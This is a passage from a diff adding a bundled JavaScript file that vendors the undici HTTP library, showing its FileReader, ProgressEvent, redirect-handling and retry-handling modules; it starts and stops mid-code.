'ksc5601': + case 'ksc_5601': + case 'windows-949': + return 'EUC-KR' + case 'csiso2022kr': + case 'hz-gb-2312': + case 'iso-2022-cn': + case 'iso-2022-cn-ext': + case 'iso-2022-kr': + case 'replacement': + return 'replacement' + case 'unicodefffe': + case 'utf-16be': + return 'UTF-16BE' + case 'csunicode': + case 'iso-10646-ucs-2': + case 'ucs-2': + case 'unicode': + case 'unicodefeff': + case 'utf-16': + case 'utf-16le': + return 'UTF-16LE' + case 'x-user-defined': + return 'x-user-defined' + default: return 'failure' + } +} + +module.exports = { + getEncoding +} + + +/***/ }), + +/***/ 1446: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + staticPropertyDescriptors, + readOperation, + fireAProgressEvent +} = __nccwpck_require__(7530) +const { + kState, + kError, + kResult, + kEvents, + kAborted +} = __nccwpck_require__(9054) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + +class FileReader extends EventTarget { + constructor () { + super() + + this[kState] = 'empty' + this[kResult] = null + this[kError] = null + this[kEvents] = { + loadend: null, + error: null, + abort: null, + load: null, + progress: null, + loadstart: null + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-readAsArrayBuffer + * @param {import('buffer').Blob} blob + */ + readAsArrayBuffer (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsArrayBuffer' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsArrayBuffer(blob) method, when invoked, + // must initiate a read operation for blob with ArrayBuffer. + readOperation(this, blob, 'ArrayBuffer') + } + + /** + * @see https://w3c.github.io/FileAPI/#readAsBinaryString + * @param {import('buffer').Blob} blob + */ + readAsBinaryString (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsBinaryString' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsBinaryString(blob) method, when invoked, + // must initiate a read operation for blob with BinaryString. + readOperation(this, blob, 'BinaryString') + } + + /** + * @see https://w3c.github.io/FileAPI/#readAsDataText + * @param {import('buffer').Blob} blob + * @param {string?} encoding + */ + readAsText (blob, encoding = undefined) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsText' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + if (encoding !== undefined) { + encoding = webidl.converters.DOMString(encoding) + } + + // The readAsText(blob, encoding) method, when invoked, + // must initiate a read operation for blob with Text and encoding. + readOperation(this, blob, 'Text', encoding) + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-readAsDataURL + * @param {import('buffer').Blob} blob + */ + readAsDataURL (blob) { + webidl.brandCheck(this, FileReader) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FileReader.readAsDataURL' }) + + blob = webidl.converters.Blob(blob, { strict: false }) + + // The readAsDataURL(blob) method, when invoked, must + // initiate a read operation for blob with DataURL. + readOperation(this, blob, 'DataURL') + } + + /** + * @see https://w3c.github.io/FileAPI/#dfn-abort + */ + abort () { + // 1. If this's state is "empty" or if this's state is + // "done" set this's result to null and terminate + // this algorithm. + if (this[kState] === 'empty' || this[kState] === 'done') { + this[kResult] = null + return + } + + // 2. If this's state is "loading" set this's state to + // "done" and set this's result to null. + if (this[kState] === 'loading') { + this[kState] = 'done' + this[kResult] = null + } + + // 3. If there are any tasks from this on the file reading + // task source in an affiliated task queue, then remove + // those tasks from that task queue. + this[kAborted] = true + + // 4. Terminate the algorithm for the read method being processed. + // TODO + + // 5. Fire a progress event called abort at this. + fireAProgressEvent('abort', this) + + // 6. If this's state is not "loading", fire a progress + // event called loadend at this. + if (this[kState] !== 'loading') { + fireAProgressEvent('loadend', this) + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-readystate + */ + get readyState () { + webidl.brandCheck(this, FileReader) + + switch (this[kState]) { + case 'empty': return this.EMPTY + case 'loading': return this.LOADING + case 'done': return this.DONE + } + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-result + */ + get result () { + webidl.brandCheck(this, FileReader) + + // The result attribute’s getter, when invoked, must return + // this's result. + return this[kResult] + } + + /** + * @see https://w3c.github.io/FileAPI/#dom-filereader-error + */ + get error () { + webidl.brandCheck(this, FileReader) + + // The error attribute’s getter, when invoked, must return + // this's error. + return this[kError] + } + + get onloadend () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].loadend + } + + set onloadend (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].loadend) { + this.removeEventListener('loadend', this[kEvents].loadend) + } + + if (typeof fn === 'function') { + this[kEvents].loadend = fn + this.addEventListener('loadend', fn) + } else { + this[kEvents].loadend = null + } + } + + get onerror () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].error + } + + set onerror (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].error) { + this.removeEventListener('error', this[kEvents].error) + } + + if (typeof fn === 'function') { + this[kEvents].error = fn + this.addEventListener('error', fn) + } else { + this[kEvents].error = null + } + } + + get onloadstart () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].loadstart + } + + set onloadstart (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].loadstart) { + this.removeEventListener('loadstart', this[kEvents].loadstart) + } + + if (typeof fn === 'function') { + this[kEvents].loadstart = fn + this.addEventListener('loadstart', fn) + } else { + this[kEvents].loadstart = null + } + } + + get onprogress () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].progress + } + + set onprogress (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].progress) { + this.removeEventListener('progress', this[kEvents].progress) + } + + if (typeof fn === 'function') { + this[kEvents].progress = fn + this.addEventListener('progress', fn) + } else { + this[kEvents].progress = null + } + } + + get onload () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].load + } + + set onload (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].load) { + this.removeEventListener('load', this[kEvents].load) + } + + if (typeof fn === 'function') { + this[kEvents].load = fn + this.addEventListener('load', fn) + } else { + this[kEvents].load = null + } + } + + get onabort () { + webidl.brandCheck(this, FileReader) + + return this[kEvents].abort + } + + set onabort (fn) { + webidl.brandCheck(this, FileReader) + + if (this[kEvents].abort) { + this.removeEventListener('abort', this[kEvents].abort) + } + + if (typeof fn === 'function') { + this[kEvents].abort = fn + this.addEventListener('abort', fn) + } else { + this[kEvents].abort = null + } + } +} + +// https://w3c.github.io/FileAPI/#dom-filereader-empty +FileReader.EMPTY = FileReader.prototype.EMPTY = 0 +// https://w3c.github.io/FileAPI/#dom-filereader-loading +FileReader.LOADING = FileReader.prototype.LOADING = 1 +// https://w3c.github.io/FileAPI/#dom-filereader-done +FileReader.DONE = FileReader.prototype.DONE = 2 + +Object.defineProperties(FileReader.prototype, { + EMPTY: staticPropertyDescriptors, + LOADING: staticPropertyDescriptors, + DONE: staticPropertyDescriptors, + readAsArrayBuffer: kEnumerableProperty, + readAsBinaryString: kEnumerableProperty, + readAsText: kEnumerableProperty, + readAsDataURL: kEnumerableProperty, + abort: kEnumerableProperty, + readyState: kEnumerableProperty, + result: kEnumerableProperty, + error: kEnumerableProperty, + onloadstart: kEnumerableProperty, + onprogress: kEnumerableProperty, + onload: kEnumerableProperty, + onabort: kEnumerableProperty, + onerror: kEnumerableProperty, + onloadend: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'FileReader', + writable: false, + enumerable: false, + configurable: true + } +}) + +Object.defineProperties(FileReader, { + EMPTY: staticPropertyDescriptors, + LOADING: staticPropertyDescriptors, + DONE: staticPropertyDescriptors +}) + +module.exports = { + FileReader +} + + +/***/ }), + +/***/ 5504: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) + +const kState = Symbol('ProgressEvent state') + +/** + * @see https://xhr.spec.whatwg.org/#progressevent + */ +class ProgressEvent extends Event { + constructor (type, eventInitDict = {}) { + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.ProgressEventInit(eventInitDict ?? {}) + + super(type, eventInitDict) + + this[kState] = { + lengthComputable: eventInitDict.lengthComputable, + loaded: eventInitDict.loaded, + total: eventInitDict.total + } + } + + get lengthComputable () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].lengthComputable + } + + get loaded () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].loaded + } + + get total () { + webidl.brandCheck(this, ProgressEvent) + + return this[kState].total + } +} + +webidl.converters.ProgressEventInit = webidl.dictionaryConverter([ + { + key: 'lengthComputable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'loaded', + converter: webidl.converters['unsigned long long'], + defaultValue: 0 + }, + { + key: 'total', + converter: webidl.converters['unsigned long long'], + defaultValue: 0 + }, + { + key: 'bubbles', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'cancelable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'composed', + converter: webidl.converters.boolean, + defaultValue: false + } +]) + +module.exports = { + ProgressEvent +} + + +/***/ }), + +/***/ 9054: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kState: Symbol('FileReader state'), + kResult: Symbol('FileReader result'), + kError: Symbol('FileReader error'), + kLastProgressEventFired: Symbol('FileReader last progress event fired timestamp'), + kEvents: Symbol('FileReader events'), + kAborted: Symbol('FileReader aborted') +} + + +/***/ }), + +/***/ 7530: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + kState, + kError, + kResult, + kAborted, + kLastProgressEventFired +} = __nccwpck_require__(9054) +const { ProgressEvent } = __nccwpck_require__(5504) +const { getEncoding } = __nccwpck_require__(4854) +const { DOMException } = __nccwpck_require__(1037) +const { serializeAMimeType, parseMIMEType } = __nccwpck_require__(685) +const { types } = __nccwpck_require__(3837) +const { StringDecoder } = __nccwpck_require__(1576) +const { btoa } = __nccwpck_require__(4300) + +/** @type {PropertyDescriptor} */ +const staticPropertyDescriptors = { + enumerable: true, + writable: false, + configurable: false +} + +/** + * @see https://w3c.github.io/FileAPI/#readOperation + * @param {import('./filereader').FileReader} fr + * @param {import('buffer').Blob} blob + * @param {string} type + * @param {string?} encodingName + */ +function readOperation (fr, blob, type, encodingName) { + // 1. If fr’s state is "loading", throw an InvalidStateError + // DOMException. + if (fr[kState] === 'loading') { + throw new DOMException('Invalid state', 'InvalidStateError') + } + + // 2. Set fr’s state to "loading". + fr[kState] = 'loading' + + // 3. Set fr’s result to null. + fr[kResult] = null + + // 4. Set fr’s error to null. + fr[kError] = null + + // 5. Let stream be the result of calling get stream on blob. + /** @type {import('stream/web').ReadableStream} */ + const stream = blob.stream() + + // 6. Let reader be the result of getting a reader from stream. + const reader = stream.getReader() + + // 7. Let bytes be an empty byte sequence. + /** @type {Uint8Array[]} */ + const bytes = [] + + // 8. Let chunkPromise be the result of reading a chunk from + // stream with reader. + let chunkPromise = reader.read() + + // 9. Let isFirstChunk be true. + let isFirstChunk = true + + // 10. In parallel, while true: + // Note: "In parallel" just means non-blocking + // Note 2: readOperation itself cannot be async as double + // reading the body would then reject the promise, instead + // of throwing an error. + ;(async () => { + while (!fr[kAborted]) { + // 1. Wait for chunkPromise to be fulfilled or rejected. + try { + const { done, value } = await chunkPromise + + // 2. If chunkPromise is fulfilled, and isFirstChunk is + // true, queue a task to fire a progress event called + // loadstart at fr. + if (isFirstChunk && !fr[kAborted]) { + queueMicrotask(() => { + fireAProgressEvent('loadstart', fr) + }) + } + + // 3. Set isFirstChunk to false. + isFirstChunk = false + + // 4. If chunkPromise is fulfilled with an object whose + // done property is false and whose value property is + // a Uint8Array object, run these steps: + if (!done && types.isUint8Array(value)) { + // 1. Let bs be the byte sequence represented by the + // Uint8Array object. + + // 2. Append bs to bytes. + bytes.push(value) + + // 3. If roughly 50ms have passed since these steps + // were last invoked, queue a task to fire a + // progress event called progress at fr. + if ( + ( + fr[kLastProgressEventFired] === undefined || + Date.now() - fr[kLastProgressEventFired] >= 50 + ) && + !fr[kAborted] + ) { + fr[kLastProgressEventFired] = Date.now() + queueMicrotask(() => { + fireAProgressEvent('progress', fr) + }) + } + + // 4. Set chunkPromise to the result of reading a + // chunk from stream with reader. + chunkPromise = reader.read() + } else if (done) { + // 5. Otherwise, if chunkPromise is fulfilled with an + // object whose done property is true, queue a task + // to run the following steps and abort this algorithm: + queueMicrotask(() => { + // 1. Set fr’s state to "done". + fr[kState] = 'done' + + // 2. Let result be the result of package data given + // bytes, type, blob’s type, and encodingName. + try { + const result = packageData(bytes, type, blob.type, encodingName) + + // 4. Else: + + if (fr[kAborted]) { + return + } + + // 1. Set fr’s result to result. + fr[kResult] = result + + // 2. Fire a progress event called load at the fr. + fireAProgressEvent('load', fr) + } catch (error) { + // 3. If package data threw an exception error: + + // 1. Set fr’s error to error. + fr[kError] = error + + // 2. Fire a progress event called error at fr. + fireAProgressEvent('error', fr) + } + + // 5. If fr’s state is not "loading", fire a progress + // event called loadend at the fr. + if (fr[kState] !== 'loading') { + fireAProgressEvent('loadend', fr) + } + }) + + break + } + } catch (error) { + if (fr[kAborted]) { + return + } + + // 6. Otherwise, if chunkPromise is rejected with an + // error error, queue a task to run the following + // steps and abort this algorithm: + queueMicrotask(() => { + // 1. Set fr’s state to "done". + fr[kState] = 'done' + + // 2. Set fr’s error to error. + fr[kError] = error + + // 3. Fire a progress event called error at fr. + fireAProgressEvent('error', fr) + + // 4. If fr’s state is not "loading", fire a progress + // event called loadend at fr. + if (fr[kState] !== 'loading') { + fireAProgressEvent('loadend', fr) + } + }) + + break + } + } + })() +} + +/** + * @see https://w3c.github.io/FileAPI/#fire-a-progress-event + * @see https://dom.spec.whatwg.org/#concept-event-fire + * @param {string} e The name of the event + * @param {import('./filereader').FileReader} reader + */ +function fireAProgressEvent (e, reader) { + // The progress event e does not bubble. e.bubbles must be false + // The progress event e is NOT cancelable. e.cancelable must be false + const event = new ProgressEvent(e, { + bubbles: false, + cancelable: false + }) + + reader.dispatchEvent(event) +} + +/** + * @see https://w3c.github.io/FileAPI/#blob-package-data + * @param {Uint8Array[]} bytes + * @param {string} type + * @param {string?} mimeType + * @param {string?} encodingName + */ +function packageData (bytes, type, mimeType, encodingName) { + // 1. A Blob has an associated package data algorithm, given + // bytes, a type, a optional mimeType, and a optional + // encodingName, which switches on type and runs the + // associated steps: + + switch (type) { + case 'DataURL': { + // 1. Return bytes as a DataURL [RFC2397] subject to + // the considerations below: + // * Use mimeType as part of the Data URL if it is + // available in keeping with the Data URL + // specification [RFC2397]. + // * If mimeType is not available return a Data URL + // without a media-type. [RFC2397]. + + // https://datatracker.ietf.org/doc/html/rfc2397#section-3 + // dataurl := "data:" [ mediatype ] [ ";base64" ] "," data + // mediatype := [ type "/" subtype ] *( ";" parameter ) + // data := *urlchar + // parameter := attribute "=" value + let dataURL = 'data:' + + const parsed = parseMIMEType(mimeType || 'application/octet-stream') + + if (parsed !== 'failure') { + dataURL += serializeAMimeType(parsed) + } + + dataURL += ';base64,' + + const decoder = new StringDecoder('latin1') + + for (const chunk of bytes) { + dataURL += btoa(decoder.write(chunk)) + } + + dataURL += btoa(decoder.end()) + + return dataURL + } + case 'Text': { + // 1. Let encoding be failure + let encoding = 'failure' + + // 2. If the encodingName is present, set encoding to the + // result of getting an encoding from encodingName. + if (encodingName) { + encoding = getEncoding(encodingName) + } + + // 3. If encoding is failure, and mimeType is present: + if (encoding === 'failure' && mimeType) { + // 1. Let type be the result of parse a MIME type + // given mimeType. + const type = parseMIMEType(mimeType) + + // 2. If type is not failure, set encoding to the result + // of getting an encoding from type’s parameters["charset"]. + if (type !== 'failure') { + encoding = getEncoding(type.parameters.get('charset')) + } + } + + // 4. If encoding is failure, then set encoding to UTF-8. + if (encoding === 'failure') { + encoding = 'UTF-8' + } + + // 5. Decode bytes using fallback encoding encoding, and + // return the result. + return decode(bytes, encoding) + } + case 'ArrayBuffer': { + // Return a new ArrayBuffer whose contents are bytes. + const sequence = combineByteSequences(bytes) + + return sequence.buffer + } + case 'BinaryString': { + // Return bytes as a binary string, in which every byte + // is represented by a code unit of equal value [0..255]. + let binaryString = '' + + const decoder = new StringDecoder('latin1') + + for (const chunk of bytes) { + binaryString += decoder.write(chunk) + } + + binaryString += decoder.end() + + return binaryString + } + } +} + +/** + * @see https://encoding.spec.whatwg.org/#decode + * @param {Uint8Array[]} ioQueue + * @param {string} encoding + */ +function decode (ioQueue, encoding) { + const bytes = combineByteSequences(ioQueue) + + // 1. Let BOMEncoding be the result of BOM sniffing ioQueue. + const BOMEncoding = BOMSniffing(bytes) + + let slice = 0 + + // 2. If BOMEncoding is non-null: + if (BOMEncoding !== null) { + // 1. Set encoding to BOMEncoding. + encoding = BOMEncoding + + // 2. Read three bytes from ioQueue, if BOMEncoding is + // UTF-8; otherwise read two bytes. + // (Do nothing with those bytes.) + slice = BOMEncoding === 'UTF-8' ? 3 : 2 + } + + // 3. Process a queue with an instance of encoding’s + // decoder, ioQueue, output, and "replacement". + + // 4. Return output. + + const sliced = bytes.slice(slice) + return new TextDecoder(encoding).decode(sliced) +} + +/** + * @see https://encoding.spec.whatwg.org/#bom-sniff + * @param {Uint8Array} ioQueue + */ +function BOMSniffing (ioQueue) { + // 1. Let BOM be the result of peeking 3 bytes from ioQueue, + // converted to a byte sequence. + const [a, b, c] = ioQueue + + // 2. For each of the rows in the table below, starting with + // the first one and going down, if BOM starts with the + // bytes given in the first column, then return the + // encoding given in the cell in the second column of that + // row. Otherwise, return null. + if (a === 0xEF && b === 0xBB && c === 0xBF) { + return 'UTF-8' + } else if (a === 0xFE && b === 0xFF) { + return 'UTF-16BE' + } else if (a === 0xFF && b === 0xFE) { + return 'UTF-16LE' + } + + return null +} + +/** + * @param {Uint8Array[]} sequences + */ +function combineByteSequences (sequences) { + const size = sequences.reduce((a, b) => { + return a + b.byteLength + }, 0) + + let offset = 0 + + return sequences.reduce((a, b) => { + a.set(b, offset) + offset += b.byteLength + return a + }, new Uint8Array(size)) +} + +module.exports = { + staticPropertyDescriptors, + readOperation, + fireAProgressEvent +} + + +/***/ }), + +/***/ 1892: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +// We include a version number for the Dispatcher API. In case of breaking changes, +// this version number must be increased to avoid conflicts. +const globalDispatcher = Symbol.for('undici.globalDispatcher.1') +const { InvalidArgumentError } = __nccwpck_require__(8045) +const Agent = __nccwpck_require__(7890) + +if (getGlobalDispatcher() === undefined) { + setGlobalDispatcher(new Agent()) +} + +function setGlobalDispatcher (agent) { + if (!agent || typeof agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument agent must implement Agent') + } + Object.defineProperty(globalThis, globalDispatcher, { + value: agent, + writable: true, + enumerable: false, + configurable: false + }) +} + +function getGlobalDispatcher () { + return globalThis[globalDispatcher] +} + +module.exports = { + setGlobalDispatcher, + getGlobalDispatcher +} + + +/***/ }), + +/***/ 6930: +/***/ ((module) => { + +"use strict"; + + +module.exports = class DecoratorHandler { + constructor (handler) { + this.handler = handler + } + + onConnect (...args) { + return this.handler.onConnect(...args) + } + + onError (...args) { + return this.handler.onError(...args) + } + + onUpgrade (...args) { + return this.handler.onUpgrade(...args) + } + + onHeaders (...args) { + return this.handler.onHeaders(...args) + } + + onData (...args) { + return this.handler.onData(...args) + } + + onComplete (...args) { + return this.handler.onComplete(...args) + } + + onBodySent (...args) { + return this.handler.onBodySent(...args) + } +} + + +/***/ }), + +/***/ 2860: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const util = __nccwpck_require__(3983) +const { kBodyUsed } = __nccwpck_require__(2785) +const assert = __nccwpck_require__(9491) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const EE = __nccwpck_require__(2361) + +const redirectableStatusCodes = [300, 301, 302, 303, 307, 308] + +const kBody = Symbol('body') + +class BodyAsyncIterable { + constructor (body) { + this[kBody] = body + this[kBodyUsed] = false + } + + async * [Symbol.asyncIterator] () { + assert(!this[kBodyUsed], 'disturbed') + this[kBodyUsed] = true + yield * this[kBody] + } +} + +class RedirectHandler { + constructor (dispatch, maxRedirections, opts, handler) { + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + util.validateHandler(handler, opts.method, opts.upgrade) + + this.dispatch = dispatch + this.location = null + this.abort = null + this.opts = { ...opts, maxRedirections: 0 } // opts must be a copy + this.maxRedirections = maxRedirections + this.handler = handler + this.history = [] + + if (util.isStream(this.opts.body)) { + // TODO (fix): Provide some way for the user to cache the file to e.g. /tmp + // so that it can be dispatched again? + // TODO (fix): Do we need 100-expect support to provide a way to do this properly? + if (util.bodyLength(this.opts.body) === 0) { + this.opts.body + .on('data', function () { + assert(false) + }) + } + + if (typeof this.opts.body.readableDidRead !== 'boolean') { + this.opts.body[kBodyUsed] = false + EE.prototype.on.call(this.opts.body, 'data', function () { + this[kBodyUsed] = true + }) + } + } else if (this.opts.body && typeof this.opts.body.pipeTo === 'function') { + // TODO (fix): We can't access ReadableStream internal state + // to determine whether or not it has been disturbed. This is just + // a workaround. + this.opts.body = new BodyAsyncIterable(this.opts.body) + } else if ( + this.opts.body && + typeof this.opts.body !== 'string' && + !ArrayBuffer.isView(this.opts.body) && + util.isIterable(this.opts.body) + ) { + // TODO: Should we allow re-using iterable if !this.opts.idempotent + // or through some other flag? + this.opts.body = new BodyAsyncIterable(this.opts.body) + } + } + + onConnect (abort) { + this.abort = abort + this.handler.onConnect(abort, { history: this.history }) + } + + onUpgrade (statusCode, headers, socket) { + this.handler.onUpgrade(statusCode, headers, socket) + } + + onError (error) { + this.handler.onError(error) + } + + onHeaders (statusCode, headers, resume, statusText) { + this.location = this.history.length >= this.maxRedirections || util.isDisturbed(this.opts.body) + ? null + : parseLocation(statusCode, headers) + + if (this.opts.origin) { + this.history.push(new URL(this.opts.path, this.opts.origin)) + } + + if (!this.location) { + return this.handler.onHeaders(statusCode, headers, resume, statusText) + } + + const { origin, pathname, search } = util.parseURL(new URL(this.location, this.opts.origin && new URL(this.opts.path, this.opts.origin))) + const path = search ? `${pathname}${search}` : pathname + + // Remove headers referring to the original URL. + // By default it is Host only, unless it's a 303 (see below), which removes also all Content-* headers. + // https://tools.ietf.org/html/rfc7231#section-6.4 + this.opts.headers = cleanRequestHeaders(this.opts.headers, statusCode === 303, this.opts.origin !== origin) + this.opts.path = path + this.opts.origin = origin + this.opts.maxRedirections = 0 + this.opts.query = null + + // https://tools.ietf.org/html/rfc7231#section-6.4.4 + // In case of HTTP 303, always replace method to be either HEAD or GET + if (statusCode === 303 && this.opts.method !== 'HEAD') { + this.opts.method = 'GET' + this.opts.body = null + } + } + + onData (chunk) { + if (this.location) { + /* + https://tools.ietf.org/html/rfc7231#section-6.4 + + TLDR: undici always ignores 3xx response bodies. + + Redirection is used to serve the requested resource from another URL, so it is assumes that + no body is generated (and thus can be ignored). Even though generating a body is not prohibited. + + For status 301, 302, 303, 307 and 308 (the latter from RFC 7238), the specs mention that the body usually + (which means it's optional and not mandated) contain just an hyperlink to the value of + the Location response header, so the body can be ignored safely. + + For status 300, which is "Multiple Choices", the spec mentions both generating a Location + response header AND a response body with the other possible location to follow. + Since the spec explicitily chooses not to specify a format for such body and leave it to + servers and browsers implementors, we ignore the body as there is no specified way to eventually parse it. + */ + } else { + return this.handler.onData(chunk) + } + } + + onComplete (trailers) { + if (this.location) { + /* + https://tools.ietf.org/html/rfc7231#section-6.4 + + TLDR: undici always ignores 3xx response trailers as they are not expected in case of redirections + and neither are useful if present. + + See comment on onData method above for more detailed informations. + */ + + this.location = null + this.abort = null + + this.dispatch(this.opts, this) + } else { + this.handler.onComplete(trailers) + } + } + + onBodySent (chunk) { + if (this.handler.onBodySent) { + this.handler.onBodySent(chunk) + } + } +} + +function parseLocation (statusCode, headers) { + if (redirectableStatusCodes.indexOf(statusCode) === -1) { + return null + } + + for (let i = 0; i < headers.length; i += 2) { + if (headers[i].toString().toLowerCase() === 'location') { + return headers[i + 1] + } + } +} + +// https://tools.ietf.org/html/rfc7231#section-6.4.4 +function shouldRemoveHeader (header, removeContent, unknownOrigin) { + return ( + (header.length === 4 && header.toString().toLowerCase() === 'host') || + (removeContent && header.toString().toLowerCase().indexOf('content-') === 0) || + (unknownOrigin && header.length === 13 && header.toString().toLowerCase() === 'authorization') || + (unknownOrigin && header.length === 6 && header.toString().toLowerCase() === 'cookie') + ) +} + +// https://tools.ietf.org/html/rfc7231#section-6.4 +function cleanRequestHeaders (headers, removeContent, unknownOrigin) { + const ret = [] + if (Array.isArray(headers)) { + for (let i = 0; i < headers.length; i += 2) { + if (!shouldRemoveHeader(headers[i], removeContent, unknownOrigin)) { + ret.push(headers[i], headers[i + 1]) + } + } + } else if (headers && typeof headers === 'object') { + for (const key of Object.keys(headers)) { + if (!shouldRemoveHeader(key, removeContent, unknownOrigin)) { + ret.push(key, headers[key]) + } + } + } else { + assert(headers == null, 'headers must be an object or an array') + } + return ret +} + +module.exports = RedirectHandler + + +/***/ }), + +/***/ 2286: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) + +const { kRetryHandlerDefaultRetry } = __nccwpck_require__(2785) +const { RequestRetryError } = __nccwpck_require__(8045) +const { isDisturbed, parseHeaders, parseRangeHeader } = __nccwpck_require__(3983) + +function calculateRetryAfterHeader (retryAfter) { + const current = Date.now() + const diff = new Date(retryAfter).getTime() - current + + return diff +} + +class RetryHandler { + constructor (opts, handlers) { + const { retryOptions, ...dispatchOpts } = opts + const { + // Retry scoped + retry: retryFn, + maxRetries, + maxTimeout, + minTimeout, + timeoutFactor, + // Response scoped + methods, + errorCodes, + retryAfter, + statusCodes + } = retryOptions ?? {} + + this.dispatch = handlers.dispatch + this.handler = handlers.handler + this.opts = dispatchOpts + this.abort = null + this.aborted = false + this.retryOpts = { + retry: retryFn ?? RetryHandler[kRetryHandlerDefaultRetry], + retryAfter: retryAfter ?? true, + maxTimeout: maxTimeout ?? 30 * 1000, // 30s, + timeout: minTimeout ?? 500, // .5s + timeoutFactor: timeoutFactor ?? 2, + maxRetries: maxRetries ?? 5, + // What errors we should retry + methods: methods ?? ['GET', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE'], + // Indicates which errors to retry + statusCodes: statusCodes ?? [500, 502, 503, 504, 429], + // List of errors to retry + errorCodes: errorCodes ?? [ + 'ECONNRESET', + 'ECONNREFUSED', + 'ENOTFOUND', + 'ENETDOWN', + 'ENETUNREACH', + 'EHOSTDOWN', + 'EHOSTUNREACH', + 'EPIPE' + ] + } + + this.retryCount = 0 + this.start = 0 + this.end = null + this.etag = null + this.resume = null + + // Handle possible onConnect duplication + this.handler.onConnect(reason => { + this.aborted = true + if (this.abort) { + this.abort(reason) + } else { + this.reason = reason + } + }) + } + + onRequestSent () { + if (this.handler.onRequestSent) { + this.handler.onRequestSent() + } + } + + onUpgrade (statusCode, headers, socket) { + if (this.handler.onUpgrade) { + this.handler.onUpgrade(statusCode, headers, socket) + } + } + + onConnect (abort) { + if (this.aborted) { + abort(this.reason) + } else { + this.abort = abort + } + } + + onBodySent (chunk) { + if (this.handler.onBodySent) return this.handler.onBodySent(chunk) + } + + static [kRetryHandlerDefaultRetry] (err, { state, opts }, cb) { + const { statusCode, code, headers } = err + const { method, retryOptions } = opts + const { + maxRetries, + timeout, + maxTimeout, + timeoutFactor, + statusCodes, + errorCodes, + methods + } = retryOptions + let { counter, currentTimeout } = state + + currentTimeout = + currentTimeout != null && currentTimeout > 0 ? currentTimeout : timeout + + // Any code that is not a Undici's originated and allowed to retry + if ( + code && + code !== 'UND_ERR_REQ_RETRY' && + code !== 'UND_ERR_SOCKET' && + !errorCodes.includes(code) + ) { + cb(err) + return + } + + // If a set of method are provided and the current method is not in the list + if (Array.isArray(methods) && !methods.includes(method)) { + cb(err) + return + } + + // If a set of status code are provided and the current status code is not in the list + if ( + statusCode != null && + Array.isArray(statusCodes) && + !statusCodes.includes(statusCode) + ) { + cb(err) + return + } + + // If we reached the max number of retries + if (counter > maxRetries) { + cb(err) + return + } + + let retryAfterHeader = headers != null && headers['retry-after'] + if (retryAfterHeader) { + retryAfterHeader = Number(retryAfterHeader) + retryAfterHeader = isNaN(retryAfterHeader) + ? calculateRetryAfterHeader(retryAfterHeader) + : retryAfterHeader * 1e3 // Retry-After is in seconds + } + + const retryTimeout = + retryAfterHeader > 0 + ? Math.min(retryAfterHeader, maxTimeout) + : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) + + state.currentTimeout = retryTimeout + + setTimeout(() => cb(null), retryTimeout) + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const headers = parseHeaders(rawHeaders) + + this.retryCount += 1 + + if (statusCode >= 300) { + this.abort( + new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Checkpoint for resume from where we left it + if (this.resume != null) { + this.resume = null + + if (statusCode !== 206) { + return true + } + + const contentRange = parseRangeHeader(headers['content-range']) + // If no content range + if (!contentRange) { + this.abort( + new RequestRetryError('Content-Range mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Let's start with a weak etag check + if (this.etag != null && this.etag !== headers.etag) { + this.abort( + new RequestRetryError('ETag mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + const { start, size, end = size } = contentRange + + assert(this.start === start, 'content-range mismatch') + assert(this.end == null || this.end === end, 'content-range mismatch') + + this.resume = resume + return true + } + + if (this.end == null) { + if (statusCode === 206) { + // First time we receive 206 + const range = parseRangeHeader(headers['content-range']) + + if (range 